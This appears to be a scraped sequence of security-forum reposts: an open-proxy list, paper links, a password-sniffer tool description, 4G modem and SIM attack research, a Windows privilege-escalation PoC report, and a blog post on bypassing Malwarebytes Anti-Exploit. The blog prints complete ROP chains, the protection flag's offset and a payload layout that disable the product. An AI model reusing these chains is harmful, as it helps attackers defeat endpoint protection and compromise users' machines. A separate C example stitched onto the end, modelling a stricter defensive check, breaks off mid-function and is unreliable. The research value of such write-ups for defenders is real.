201.208.178.145:3128 201.208.190.196:9064 201.208.196.109:9064 201.208.232.183:8080 201.208.37.110:9064 201.208.45.1:8080 201.209.102.216:9064 201.209.195.17:9064 201.209.199.156:9064 201.209.200.11:8080 201.209.201.173:9064 201.209.222.238:8080 201.209.232.133:8080 201.209.240.208:9064 201.209.42.1:9064 201.209.43.87:8080 201.209.67.145:9064 201.209.87.60:9064 201.209.89.82:8080 201.209.91.177:8080 201.209.98.204:8080 201.210.153.41:9064 201.210.195.140:8080 201.210.197.10:9064 201.210.206.100:8080 201.210.218.1:9064 201.210.219.243:8080 201.210.245.190:9064 201.210.255.240:8080 201.211.103.175:8080 201.211.108.172:9064 201.211.109.36:8080 201.211.117.183:9064 201.211.122.167:9064 201.211.140.90:9064 201.211.163.180:8080 201.211.192.58:8080 201.211.197.126:8080 201.211.198.238:9064 201.219.22.43:8080 201.222.55.162:8080 201.241.29.250:9064 201.242.113.156:8080 201.242.154.238:9064 201.242.155.233:9064 201.242.18.162:9064 201.242.34.76:8080 201.242.47.172:8080 201.242.78.240:9064 201.242.93.60:8080 201.243.129.66:9064 201.243.131.54:8080 201.243.137.97:9064 201.243.138.214:9064 201.243.168.219:8080 201.243.186.229:8080 201.243.194.141:8080 201.243.212.20:9064 201.243.61.122:9064 201.248.111.38:8080 201.248.237.60:9064 201.249.17.31:8080 201.39.89.51:3128 201.4.9.144:8080 201.56.148.195:3128 201.80.44.156:8080 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.112.128.91:3128 202.118.250.234:8080 202.141.250.173:80 202.145.3.242:8080 202.151.248.22:80 202.153.130.214:80 202.161.89.198:8080 202.169.235.69:8080 202.171.253.74:82 202.171.253.74:83 202.171.253.74:85 202.171.253.84:86 202.177.238.204:9064 202.197.227.228:8088 202.22.195.86:8080 202.29.97.5:3128 202.38.95.66:8080 202.56.231.117:8080 202.62.10.178:8080 202.62.72.139:9064 202.78.233.214:9064 202.99.16.28:3128 203.144.144.162:8080 203.144.144.166:8080 203.169.246.37:3128 203.172.129.4:8080 203.176.182.101:8080 203.176.182.98:8080 203.190.116.235:9064 203.192.12.146:80 203.195.175.15:8080 
203.70.253.49:9064 205.129.191.112:80 206.181.83.254:80 207.108.136.68:443 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:8080 210.14.152.92:88 210.195.43.136:3128 210.209.79.200:808 210.75.14.158:80 211.144.81.66:18000 211.144.81.66:18001 211.162.0.163:80 212.109.144.117:8080 212.200.153.157:8080 212.56.207.186:3128 212.98.72.13:80 213.141.147.193:8080 216.171.205.9:8080 216.92.112.113:80 217.112.161.16:80 217.117.6.20:8080 218.164.101.27:9064 218.164.143.112:9064 218.164.161.90:9064 218.164.72.60:9064 218.173.173.148:9064 218.201.42.115:80 218.201.42.115:8080 218.203.13.172:80 218.203.13.173:80 218.203.13.174:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.203.13.190:80 218.204.96.254:8123 218.205.229.186:3128 218.207.172.236:80 218.207.208.55:8080 218.207.29.77:8123 218.240.131.12:80 218.248.11.19:3128 218.250.124.172:9064 218.4.118.29:8118 218.44.26.122:8080 218.5.74.174:80 218.65.132.38:80 218.65.132.38:8081 218.67.42.27:18186 218.7.132.1:8080 218.76.216.56:63000 218.85.78.89:9999 218.87.111.115:8080 218.90.174.167:3128 219.134.166.18:8118 219.142.251.102:8118 219.143.84.46:9000 219.153.218.234:18186 219.217.227.93:3128 219.238.124.253:8118 219.239.227.32:3128 219.239.236.49:8888 219.246.65.143:3128 219.68.177.84:9064 219.68.55.93:9064 219.70.167.143:9064 219.84.179.66:9064 219.84.234.64:9064 219.85.104.252:9064 219.85.106.152:9064 219.85.248.97:9064 219.91.133.3:9064 219.93.183.106:8080 220.129.168.20:9064 220.129.179.238:9064 220.129.233.245:8088 220.136.12.115:9064 220.137.55.201:9064 220.141.67.102:9064 220.142.93.27:9064 220.143.168.185:9064 220.169.110.89:8080 220.169.18.69:8088 220.172.195.175:8118 220.175.89.102:18186 220.231.32.195:3128 221.10.102.199:83 221.178.30.213:8123 221.182.62.114:9999 221.182.62.115:9999 221.182.74.112:8123 221.183.16.219:80 221.221.13.124:3128 221.223.106.46:3128 221.223.40.146:9000 221.227.104.207:8118 
221.238.140.164:8080 221.5.69.51:80 221.5.69.52:8085 221.7.255.173:80 222.124.176.21:8080 222.163.174.130:8585 222.182.176.62:18186 222.217.221.239:8888 222.217.221.240:8888 222.217.221.241:8888 222.219.154.112:8118 222.246.232.55:80 222.246.232.55:8101 222.73.218.43:80 222.87.129.218:80 222.87.129.218:81 222.87.129.218:82 222.87.129.218:83 222.87.129.218:843 222.88.236.236:80 222.88.236.236:82 222.88.236.236:83 222.88.236.236:843 222.94.211.50:8118 223.180.66.197:9064 223.223.134.139:9064 223.223.136.138:9064 223.239.130.15:9064 223.255.160.26:3128 223.27.234.34:8080 223.4.21.184:80 223.64.165.13:8123 223.64.182.121:8123 223.64.53.94:8123 223.66.114.191:8123 223.66.41.19:8123 223.66.73.41:8123 223.66.74.161:8123 223.67.183.80:8123 223.67.201.13:8123 223.67.210.62:8123 223.67.211.78:8123 223.67.219.109:8123 223.67.221.46:8123 223.67.229.97:8123 223.67.239.118:8123 223.67.239.132:8123 223.67.246.163:8123 223.67.246.27:8123 223.67.66.185:8123 223.82.11.159:8123 223.82.164.241:8123 223.82.167.243:8123 223.82.172.241:8123 223.82.172.29:8123 223.82.181.179:8123 223.82.203.154:8123 223.82.203.209:8123 223.82.203.210:8123 223.82.203.61:8123 223.82.204.140:8123 223.82.205.89:8123 223.82.207.89:8123 223.82.217.93:8123 223.82.222.175:8123 223.82.222.92:8123 223.82.223.230:8123 223.82.228.88:8123 223.82.235.187:8123 223.82.242.133:8123 223.82.242.200:8123 223.82.245.168:80 223.82.245.168:81 223.82.47.163:8123 223.82.68.24:8123 223.82.69.249:8123 223.82.74.23:8123 223.82.81.166:8123 223.82.82.243:8123 223.82.82.53:8123 223.82.86.6:8123 223.82.9.31:8123 223.82.91.223:8123 223.82.95.191:8123 223.83.136.163:8123 223.83.140.112:8123 223.83.141.228:8123 223.83.141.243:8123 223.83.142.77:8123 223.83.164.248:8123 223.83.186.157:8123 223.83.189.48:8123 223.83.196.118:8123 223.83.196.225:8123 223.83.196.24:8123 223.83.197.116:8123 223.83.200.106:8123 223.83.201.25:8123 223.83.203.88:8123 223.83.208.162:8123 223.83.209.128:8123 223.83.210.145:8123 223.83.210.26:8123 223.83.212.208:8123 
223.83.217.91:8123 223.83.218.130:8123 223.83.218.2:8123 223.83.222.246:8123 223.83.223.24:8123 223.83.232.25:8123 223.83.233.9:8123 223.83.234.254:8123 223.83.236.134:8123 223.83.238.221:8123 223.83.26.170:8123 223.83.34.112:8123 223.83.35.80:8123 223.83.39.111:8123 223.83.39.205:8123 223.83.61.125:8123 223.83.62.112:8123 223.83.63.229:8123 223.83.77.87:8123 223.83.82.238:8123 223.83.83.169:8123 223.83.83.211:8123 223.83.83.48:8123 223.83.85.100:8123 223.83.87.148:8123 223.84.103.180:8123 223.84.106.41:8123 223.84.107.197:8123 223.84.131.82:8123 223.84.131.90:8123 223.84.132.23:8123 223.84.133.219:8123 223.84.134.75:8123 223.84.135.219:8123 223.84.137.154:8123 223.84.139.196:8123 223.84.139.89:8123 223.84.14.197:8123 223.84.140.120:8123 223.84.141.207:8123 223.84.142.188:8123 223.84.143.191:8123 223.84.144.231:8123 223.84.144.36:8123 223.84.144.90:8123 223.84.145.111:8123 223.84.145.132:8123 223.84.147.165:8123 223.84.15.51:8123 223.84.151.163:8123 223.84.155.158:8123 223.84.156.185:8123 223.84.156.192:8123 223.84.156.68:8123 223.84.157.212:8123 223.84.163.23:8123 223.84.163.71:8123 223.84.164.61:8123 223.84.167.116:8123 223.84.167.170:8123 223.84.177.158:8123 223.84.178.45:8123 223.84.179.108:8123 223.84.182.203:8123 223.84.182.42:8123 223.84.186.49:8123 223.84.187.163:8123 223.84.195.4:8123 223.84.2.112:8123 223.84.204.12:8123 223.84.204.185:8123 223.84.207.206:8123 223.84.208.147:8123 223.84.209.63:8123 223.84.21.232:8123 223.84.210.81:8123 223.84.212.214:8123 223.84.219.131:8123 223.84.219.45:8123 223.84.221.55:8123 223.84.23.41:8123 223.84.232.65:8123 223.84.235.152:8123 223.84.235.200:8123 223.84.236.3:8123 223.84.236.69:8123 223.84.237.118:8123 223.84.238.217:8123 223.84.238.73:8123 223.84.24.156:8123 223.84.241.124:8123 223.84.243.205:8123 223.84.251.12:8123 223.84.252.103:8123 223.84.252.46:8123 223.84.254.120:8123 223.84.254.170:8123 223.84.26.28:8123 223.84.27.78:8123 223.84.28.16:8123 223.84.28.162:8123 223.84.28.22:8123 223.84.28.60:8123 
Sursa: 31-12-14 | Fast Proxy Server List (3479) - Pastebin.com
  15. Exploiting Fundamental Weaknesses in Botnet Command and Control (C&C) Panels What Goes Around Comes Back Around ! Aditya K Sood BlackHat Security Conference Las Vegas, USA, 2014 Version 1.1 Abstract This research is primarily focused on the use of penetration testing approach to find fundamental weaknesses and configuration flaws residing in Command and Control (C&C) panels used by bot herders to manage botnets. This paper generalizes the findings that have been noticed during testing and analysis of several C&C panels. Download: http://www.secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf
  16. Intel ME Secrets Hidden code in your chipset and how to discover what exactly it does Igor Skochinsky Hex-Rays RECON 2014 Montreal High-level overview of the ME Low-level details ME security and attacks Dynamic Application Loader Results Future work Download: http://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf
  17. SniffPass – Simple Password Sniffer SniffPass is a small password monitoring software (basically a password sniffer) that listens to your network, captures the passwords that pass through your network adapter, and displays them on the screen instantly. SniffPass can capture the passwords of the following protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). You can use this utility to recover lost Web/FTP/Email passwords via your own network adapter. Requirements SniffPass can capture passwords on any 32-bit Windows operating system (Windows 98/ME/NT/2000/XP/2003/Vista) as long as the WinPcap capture driver is installed and works properly with your network adapter. You can also use SniffPass with the capture driver of Microsoft Network Monitor, if it’s installed on your system. Under Windows 2000/XP (or greater), SniffPass also allows you to capture TCP/IP packets without installing any capture driver, by using the ‘Raw Sockets’ method. However, this capture method has the following limitations: On Windows XP/SP1 passwords cannot be captured at all – thanks to Microsoft’s bug that appeared in the SP1 update… On Windows Vista with SP1, only UDP packets are captured. TCP packets are not captured at all. On Windows 7, it seems that the ‘Raw Sockets’ method works properly again, at least for now… Do note, this software is NOT designed to grab passwords from other machines on the network, and could do so but only if the computers were connected via a simple hub or unencrypted wireless networks. You can download SniffPass v1.13 here: sniffpass.zip Or read more here. Sursa: SniffPass - Simple Password Sniffer - Darknet - The Darkside
  18. [h=3]4G Security: Hacking USB Modem and SIM Card via SMS[/h] Telecommunications operators are pushing fast and cheap 4G communications technology. Yet only the chosen few know just how insecure it is. While researching the security level of 4G communications, Positive Technologies experts managed to uncover USB modem vulnerabilities that allow a potential attacker to gain full control of the connected computer as well as to access a subscriber account on a mobile operator portal. Additionally, attacks on a SIM card using a binary SMS allow an intruder to sniff and decrypt traffic or lock the SIM. The team presented their reports on the topic at the PacSec 2014 (Tokyo) and the 31C3 (Hamburg). In this article, we will give you the digest of this research conducted by Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov, and Pavel Novikov. First, we would like to say a couple of words about the main purpose of the research. It is not only the matter of security for trendy smartphones that we use to read news feed in social networks. Multiple critical infrastructures including industrial control systems (SCADA) also implement digital mobile communication based on the GSM standard. Another example from everyday life is having your money stolen from bank accounts. No one would like to become a victim of that. Yet you might have seen small antenna on ATMs. Yes, it is also GSM. A modern wireless modem is a computer that uses a well-known OS (usually Linux or Android) and a number of multifunctional applications. The software and data transfer protocols contain some vulnerabilities that attackers have successfully exploited in the last several years, say, to unlock a modem or to unbind it from the operator. To solve the problem in one blow, many services got transferred to the web. Yet it resulted in even more vulnerabilities. 
For the research purposes, we used 6 different series of USB modems with 30 different firmware versions. Only 3 firmwares proved to be hack-resistant. What did we manage to do to the rest of them? First, we identified the gear. The documentation and search engines helped us with that. In some cases Google was even more useful: it gave us the password for Telnet access. However, for external communications we need http, not Telnet. Just connect the modem to a computer and manage it as a separate network node with web applications. It gives you the opportunity to launch an attack via a browser (CSRF, XSS, RCE). This way you will force the modem to give out a lot of useful information about itself. Besides obtaining data, we may use the modem to do the following: change DNS settings (to sniff traffic), change SMS center settings (to intercept and interfere with SMS), change the password on the self-service portal by sending an SMS (to transfer money by subscribing to a third-party service), lock the modem by deliberately entering wrong PIN or PUK codes, remotely "update" the modem's firmware to a vulnerable version. You may advance your attack even further by accessing the computer connected to the hacked modem. One way to do it is to install a USB keyboard driver, which causes the computer to identify the modem as an input device. Use this pseudo keyboard to issue the command to reboot the system from an external disk, aka the very same modem. Then all that is left to do is to install a bootkit that allows you to remotely control the device. You may check out the video for visual evidence: The best countermeasure any ordinary user should take is stop inserting this and that into your USB ports. By "this and that" we also mean innocent-looking USB modems that appear to be such small and harmless communication devices. We dedicated the second part of our research to SIM cards. 
The fact that a SIM card is a computer with an OS, file system, and multifunctional applications was proven long ago. As the German cryptographer Karsten Nohl demonstrated at the Positive Hack Days conference, SIM applications (TARs) are protected in different ways. Some you may hack by brute-forcing DES keys. Some respond to an external command without any protection whatsoever and may give out a lot of sensitive information. To brute-force DES keys, we use a set of field-programmable gate arrays (FPGA), which became trendy for Bitcoin mining a couple of years ago and got cheaper after the hype was over. The speed of our 8 modules *ZTEX 1.15y board with the price tag of 2,000 Euro is 245.760 Mcrypt/sec. It is enough to obtain the key within 3 days. Then we may easily issue commands to well-known TARs and manage them; e.g. Card Manager allows installing a Java application to the SIM. Another curious TAR is a file system that stores TMSI (Temporary Mobile Subscriber Identity) and Kc (Ciphering Key). We may perform the following actions via a binary SMS: decrypt subscriber traffic without using brute force attacks on DES, spoof a subscriber's identity (receive his/her calls and SMS), track a subscriber's whereabouts, cause DOS by entering 3 wrong PIN codes and 10 wrong PUK codes in a row if PIN code is enabled for file system protection. It’s worth to note that the attack described above could successfully circumvent not only A5/1 (the most commonly used cellphone encryption algorithm for 2G networks), but also the stronger versions of encryption used in 3G and 4G. In conclusion, let us look at basic statistics. We used more than 100 SIM cards of different origin for the research, around 20% of those have vulnerabilities mentioned earlier, which means every fifth SIM card is flawed. Even so, it is hard to give any security advice to end users. 
These attacks are mostly targeting basic technological level vulnerabilities, and it is the manufacturers' and telcos' task to fix them. The world press has already described this research as "SMS pwnage on MEELLIONS of flawed SIM cards, popular 4G modems". Posted by Positive Research at 11:26 PM Sursa: Positive Research Center: 4G Security: Hacking USB Modem and SIM Card via SMS
  19. Windows: Elevation of Privilege in ahcache.sys/NtApphelpCacheControl Platform: Windows 8.1 Update 32/64 bit (No other OS tested) On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse. It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7. NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes. The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. 
To verify perform the following steps: 1) Put the AppCompatCache.exe and Testdll.dll on disk 2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). 3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". 4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Sursa: https://code.google.com/p/google-security-research/issues/detail?id=118#c3
  20. [h=3]MBAE (Malware Bytes Anti Exploit) Disarm[/h] Not very long ago, security industry shifted from malwares to exploits. Though malware industry still dominates the market due to its sophistication and reach, exploits are nothing but the new sexy. Just like in old days antivirus were starting up, exploit detection systems are increasing nowadays and malware enthusiasts are shifting towards this trend. Exploits can get you more money, much much more than what malware authors get by selling their creations. Not to mention the fame that goes with exploit development (automatically being a whitehat, if you disclosed a 0day responsibly or not) is also more in quantity and won't feel embarrassing to tell others as compared to a malware author. While malware authors are always considered blackhats, exploit authors are born whitehats even though they do shady business. =) Market trend gave away the two most used exploit detection free toolkits 1. EMET 2. MBAE And despite the false positives and fake alerts, they both pack quite a punch. After searching a while i found an article from offensive security which claimed to bypass EMET successfully. Though the method they used was out of the box, EMET doesn't get updated that regularly so its fine i guess. EMET disarming By OffSec TLDR: The logic behind this attack was a global switch which can be used to protect & unprotect applications. If you alter it, all protections go kaputt. In this blogpost i will be covering something similar to bypass all of MBAE's checks. [h=3]Epilogue[/h] for the sake of reader i have already hosted the POC of mbae bypass at my Github Acc POC: Github Note: i have modified a POC i got from a public forum, and simply added Rop Gadgets. [h=3]Prologue[/h] Kafeine had done quite a piece on malware bytes making them seem like a very different company offering a unique product. malware.dontneedcoffee [h=3]Story[/h] So i got my hands on MBAE. Pretty nice UI ima. 
Unlike most exploit authors, instead of working on a public heap corruption exploit i tried to execute my favourite and oldest exploit. The very first i ever laid my hands on, CVE-2010-3333. With html based exploits we have few advantages: 1. we can use DOM to check for presence of specific dll's (for detection of EMET or MBAE) 2. If we leverage information leak vuln, we can build a rop chain with static offsets from inside dll memory in runtime. 3. we can place strings on heap and address it, by relying on deterministic nature of heap. Thus planting strings in ROP gets easy (as done by offsec in their disarming EMET article) But in StackOverflows, only thing we have is EIP and 1 looooong ROP chain. However good for us, CVE-2010-3333 works on Windows XP-7 without ROP. On windows 8, DEP is enforced so it crashes. Nevertheless we will circumvent all that later. so i searched google for some public exploit POC, and i found one at a random forum. moment i executed that sample, MBAE caught it. Upon investigation i found out that MBAE was enforcing DEP in all processes it protected. Thus from XP-7 we cannot execute this exploit without ROP. So i went ahead and asked mona to generate a Rop Chain for VirtualProtect. Appending rop gadgets 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN The final exploit should work in Enforced DEP. However i was greeted by following upon detonation. 
Time to open the box VirtualProtect Seems Hooked Nothing useful inside first routine Interesting stuff VirtualProtect seems protected by CallPrecedenceCheck from RopGuard RopGuard_RopCheck - Ivan Fratric Moving on after checking is performed forward jump Actual Routine Prologue The automated systems i have seen by now perform nested hook filtering, meaning if they caught Kernelbase!VirtualProtect() they will skip Kernelbase!VirtualProtectEx() & Ntdll!ZwProtectVirtualMemory(). So it seems MBAE has only 1 protection which detects if return address was preceded by a call instruction. Lets see whats inside that protection then we can try to circumvent it. I was surprised to see this code, judging by the look it seems the developers of this tool quite 'literally' copied the code from RopGuard. When i say quite literally i do mean literally, because apparently they dont know what this code does. Allow me to give an insight return address - 3 is compared to 0xE8 (opcode for 16bit call instruction) if its equal then return a value which corresponds to legitimate reply. return address - 5 is compared to 0xE8 (opcode for 32bit call instruction) if its equal then return a value which corresponds to legitimate reply. When the developers blindly copied this code they perhaps didn't knew that 1. if ROP gadget which jumps into hooked api has either -5th or -3rd byte 0xE8, the check is failing 2. all a person has to do is search for this pattern in binary [?E8][XX][?E8][XX][XX][C3] to bypass the check 3. exploit author can simply VirtualProtect and return into stack at a nop sled which can be preceded by 0xE8 since we very well control stack to defeat this check easily 4. This mistake is repeated with return address -7 being compared to 0x9A (opcode for FAR CALL) and return address - 5 being compared to 0x9A again. (opcode for FAR call but with 16bit address) Blunder: Leaving aside the mistakes it has, the code is meant to be written for 32bit binaries. 
But apparently developers never bothered to check 1. If return address - 3 == 0xE8 && return address - 4 == 0x66 (prefix for 16bit call in 32bit address space) these two checks should be performed side by side for accuracy, but right now the check is if return address - 3 ==0xE8 || return addresss - 5 ==0xE8. 2. DWORD*(return address - 4) + return address - 5 should be equal to VirtualProtect, Apparently developers of this tool checked if there is a call instruction before return address but didn't check if that call is leading to hooked API or not. () (>_<) 3. If you do call a 16bit address from a 32bit address space you can only call upto 0xFFFF, if detection was concerned, no legitimate or illegitimate code can ever call an API within 0xFFFF because dll's are mapped at higher addresses closer to 0x7fffffff, Thus this check is nearly useless for detection as its useful for potential candidates looking to find flaws in this method. 4. I am pretty sure the author of RopGuard meant to simply include 16bit and 32bit Rop check in 1 package but he meant to use them one at a time depending on application architecture. But who cares. So it seems blind cope paste is not only done by engineering students, but by 'professional' developers also. VirtualProtect Returns into stack preceded by handcrafted dummy 0xE8 bytes thus bypassing ROP detection from call precedence check. While i crafted this chain by just altering 2 bytes off an already existing rop chain, i thought it would bypass MBAE completely. But it failed yet again. So i dug deeper. VirtualProtectEx is also hooked inside hook It seems that unlike usual methods of hooking 1 API and leaving its nested ones by using a global variable or a TLS entry for IPC, MBAE infact hooks all nested API's of VirtualProtect and performs different checks on either levels. Thus there are more checks, and that is why i wasn't able to bypass MBAE when using previous ROP chain with 2 modified bytes. 
VirtualProtectEx checking if lpAddress param of VirtualProtect is inside stack Checks inside ZwProtectVirtualMemory 1. StackPivot Check 2.RopGuardCallPrecedenceCheck 3.Checking if stack is being made executable Up until now, for VirtualProtect API there are only 3 protections which detect ROP. There are more protections to check if api call is from shellcode, but i dont think detecting that is necessary because once you get opcode execution these petty checks can be circumvented by n number of measures. one example being: changing PEB entry of loaded module to [x] and copying any PE header to shellcode -0x1000 address ([x]) which can be done in nearly 25 bytes using handcrafted optimized shellcode. [h=3]One Byte Issue[/h] To defeat all these protections, i followed offsec's approach. There was a global switch, a fixed offset which decided the fate of MBAE's protections. in previous images you might see a reoccurring instruction. cmp dword ptr ds:[<Magic_Offset>],0 je <mbae.LegitimateCall> This magic offset is actually a dword but it has only 2 possible values. 0 or 1 if its 0 all protections are disabled and this check will jump over detection mechanisms. if its 1 all protections are enabled and all checks will be performed with full functionality. (another way to bypass MBAE's shellcode checks) As of now December 10th 2014, this offset is 0x47C08. protection check Highlighted Now since we have a stack overflow, we cannot craft any data dynamically. So we have to perform a makeshift ROP chain which will somehow find mbae.dll's base address and then add offset to its value. Then moving null into that address. Then we can use our ROP chain used before. 
After 20 minutes of mind boggling i came up with following rop chain 0x78833e3c, # POP EAX # RETN 0x78801108, # GetModuleHandle Address from IAT 0x78830e9a, # MOV EAX,[EAX] # RETN 0x788543e9, # XCHG EAX,EDX # RETN 0x7882ab5d, # PUSH ESP # POP ESI # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x788079f0, # POP EBP # RETN 0x0000008c, # offset from esp pointing towards mbae.dll 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to mbae.dll 0x7889363e, # POP ECX # RETN 0x7889363f, # RETN 0x788fad49, # POP EDI # RETN 0x7889363f, # RETN 0x7880126c, # POP ESI # RETN 0x7888e209, # ADD ESP,0xC 0x788172ee, # PUSHAD # RETN #EAX gets base address of mbae.dll 0x788079f0, # POP EBP # RETN magic_offset, 0x788d0ba7, # ADD EAX,EBP # RETN # eax points to magic offset 0x7880A254, # POP EDX, RETN 0x00000000, # NULL 0x78907a82, # MOV [EAX],EDX # RETN 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN data appended: 9090eb09 6d6261652e646c6c00 (mbae.dll string) 909090909090909090909090909090909090 (nop sled) Since we had a stack overflow at our disposal, i had to embedd mbae.dll string in between nop sled, so ROP gadgets can take its address by reading esp. Had this been a Heap corruption vulnerability or a UAF, it would have been much more easy. Nevertheless i managed to bypass MBAE in nearly 40 gadgets, which means not much stack space is wasted. This offset can be utilized in browser exploits in a better way, exploits have the power to detect if they are running under malware bytes or emet's protection by reading system dll's. 
Up until now they just exit if they are running under such an environment, But it seems they dont need to. All an author has to do is simply change the gadgets as per exploit's requirement. This gadget chain can be reproduced very easily for any other kind of exploit, since the gadgets i used are not at all complicated and can be found in any dll with a very good probability. Afterwards this revelation, the exploit was fairly straightforward. After disabling MBAE, ROP gadgets trying to mark stack as RWX Et' Voila Posted by r41p41 at 12:06 Sursa: Scrutiny from an Inquisitive mind: MBAE (Malware Bytes Anti Exploit) Disarm
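The call-precedence weakness the post describes (any 0xE8 byte in front of the return address is accepted, without checking where that call goes) can be contrasted with a check that also resolves the call target. The following is an added example, not code from the post, from MBAE or from RopGuard; the region model, the addresses and all function names are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed 32-bit model: `bytes` is code mapped at virtual address `base`. */
typedef struct { const uint8_t *bytes; uint32_t base; uint32_t len; } region;

/* Constructed addresses, not taken from any real module. */
#define CODE_BASE 0x00401000u
#define API_ADDR  0x7C801AD4u  /* stand-in for the hooked API's entry point */
#define IAT_SLOT  0x00402000u  /* stand-in for the import slot holding API_ADDR */

static int readable(const region *r, uint32_t va, uint32_t n) {
    return va >= r->base && va - r->base <= r->len && n <= r->len - (va - r->base);
}
static uint8_t u8(const region *r, uint32_t va) { return r->bytes[va - r->base]; }
static uint32_t u32le(const region *r, uint32_t va) {
    return (uint32_t)u8(r, va) | (uint32_t)u8(r, va + 1) << 8 |
           (uint32_t)u8(r, va + 2) << 16 | (uint32_t)u8(r, va + 3) << 24;
}

/* Models only the two E8 comparisons quoted in the post:
 * any 0xE8 at ret-3 or ret-5 is treated as "preceded by a call". */
int loose_e8_check(const region *r, uint32_t ret) {
    if (!readable(r, ret - 5, 5)) return 0;
    return u8(r, ret - 3) == 0xE8 || u8(r, ret - 5) == 0xE8;
}

/* Stricter variant: the bytes before `ret` must decode as a call that
 * actually reaches the hooked API. Two encodings are accepted:
 *   E8 rel32     direct call, target = ret + rel32
 *   FF 15 abs32  call dword ptr [abs32], abs32 must be the API's import slot */
int strict_call_check(const region *r, uint32_t ret, uint32_t api, uint32_t slot) {
    if (readable(r, ret - 5, 5) && u8(r, ret - 5) == 0xE8 &&
        ret + u32le(r, ret - 4) == api)
        return 1;
    if (readable(r, ret - 6, 6) && u8(r, ret - 6) == 0xFF &&
        u8(r, ret - 5) == 0x15 && u32le(r, ret - 4) == slot)
        return 1;
    return 0;
}

enum sample { DIRECT_CALL, OTHER_CALL, STRAY_E8, IAT_CALL };

static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Fills buf with NOPs plus one constructed case; returns the return address. */
static uint32_t build_sample(enum sample s, uint8_t buf[32]) {
    uint32_t ret = CODE_BASE + 0x16;
    for (int i = 0; i < 32; i++) buf[i] = 0x90;
    switch (s) {
    case DIRECT_CALL:  /* call API_ADDR */
        buf[0x11] = 0xE8; put32(buf + 0x12, API_ADDR - ret); break;
    case OTHER_CALL:   /* a real call, but to an unrelated function */
        buf[0x11] = 0xE8; put32(buf + 0x12, (API_ADDR + 0x100) - ret); break;
    case STRAY_E8:     /* add eax, 0x3E8 ; nop : 0xE8 is immediate data */
        buf[0x10] = 0x05; put32(buf + 0x11, 0x000003E8u); break;
    case IAT_CALL:     /* call dword ptr [IAT_SLOT] */
        buf[0x10] = 0xFF; buf[0x11] = 0x15; put32(buf + 0x12, IAT_SLOT); break;
    }
    return ret;
}

/* Returns bit 1 = loose verdict, bit 0 = strict verdict for a constructed case. */
int run_sample(enum sample s) {
    uint8_t buf[32];
    uint32_t ret = build_sample(s, buf);
    region r = { buf, CODE_BASE, (uint32_t)sizeof buf };
    return loose_e8_check(&r, ret) << 1 |
           strict_call_check(&r, ret, API_ADDR, IAT_SLOT);
}

int main(void) {
    static const char *names[] = {
        "direct call to API", "call to other target",
        "stray 0xE8 in immediate", "call through import slot"
    };
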